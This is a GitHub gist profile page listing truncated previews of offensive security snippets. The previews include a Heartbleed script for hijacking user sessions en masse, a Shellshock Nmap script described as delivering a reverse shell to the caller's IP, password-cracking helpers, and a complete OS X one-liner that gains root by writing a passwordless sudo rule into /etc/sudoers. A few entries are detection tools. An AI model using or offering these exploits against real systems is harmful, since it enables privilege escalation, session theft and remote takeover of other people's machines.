Skip to content

Instantly share code, notes, and snippets.

View sh1n0b1's full-sized avatar

sh1n0b1

112 followers · 60 following
  • Bishop Fox
View GitHub Profile
@sh1n0b1
sh1n0b1 / heartbleed-altered.py
Created April 9, 2014 09:44
Using Heartbleed PoC for Hijacking User Sessions En Masse
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/
@sh1n0b1
sh1n0b1 / a04c152139d85507cac88fcc4aaf9ca9
Last active August 29, 2015 14:05
a04c152139d85507cac88fcc4aaf9ca9
$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';
@sh1n0b1
sh1n0b1 / dana-na.cgi
Created August 17, 2014 14:01
#!/usr/bin/perl -w
use CGI;
use Digest::MD5 qw(md5_hex);
$cgi = new CGI;
$SESSDIR = "/tmp/";
$sessfile = $cgi->cookie("diagsess");
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");
@sh1n0b1
sh1n0b1 / http-vuln-cve-2014-6271.nse
Created October 6, 2014 09:15
NSE script for Shellshock vulnerability, CVE-2014-6271
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d
@sh1n0b1
sh1n0b1 / gist:ed44ae7316af7337e454
Created October 10, 2014 08:15
CVE-2014-0224 (OPENSSL ChangeCipherSpec Injection) - http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/
#!/bin/python
import sys
import socket
import time
import struct
if len(sys.argv)<2:
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
quit()
@sh1n0b1
sh1n0b1 / SourceAnalyzer.php
Created January 15, 2015 19:55
PHP Source Analyzer from http://hawkee.com/snippet/4271/
<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
var obj = document.getElementById(c_id);
if (obj.style.visibility == 'hidden') {
obj.style.visibility = 'visible';
obj.style.position = 'static';
} else {
@sh1n0b1
sh1n0b1 / CVE-2015-0235.c
Created January 28, 2015 06:34
CVE-2015-0235
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
@sh1n0b1
sh1n0b1 / escalate.sh
Created July 25, 2015 00:13
OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability
# It should work for OS X 10.10-10.10.4
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
@sh1n0b1
sh1n0b1 / ecryptfs2john.py
Created August 30, 2015 10:11
https://github.com/magnumripper/JohnTheRipper/blob/bleeding-jumbo/run/ecryptfs2john.py
#!/usr/bin/env python
# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#
@sh1n0b1
sh1n0b1 / dump.pl
Created September 17, 2015 22:30
pcap SSL packet dump for Wireshark to decrypt - https://supportforums.cisco.com/blog/154046
#!/usr/bin/perl
#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013
use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;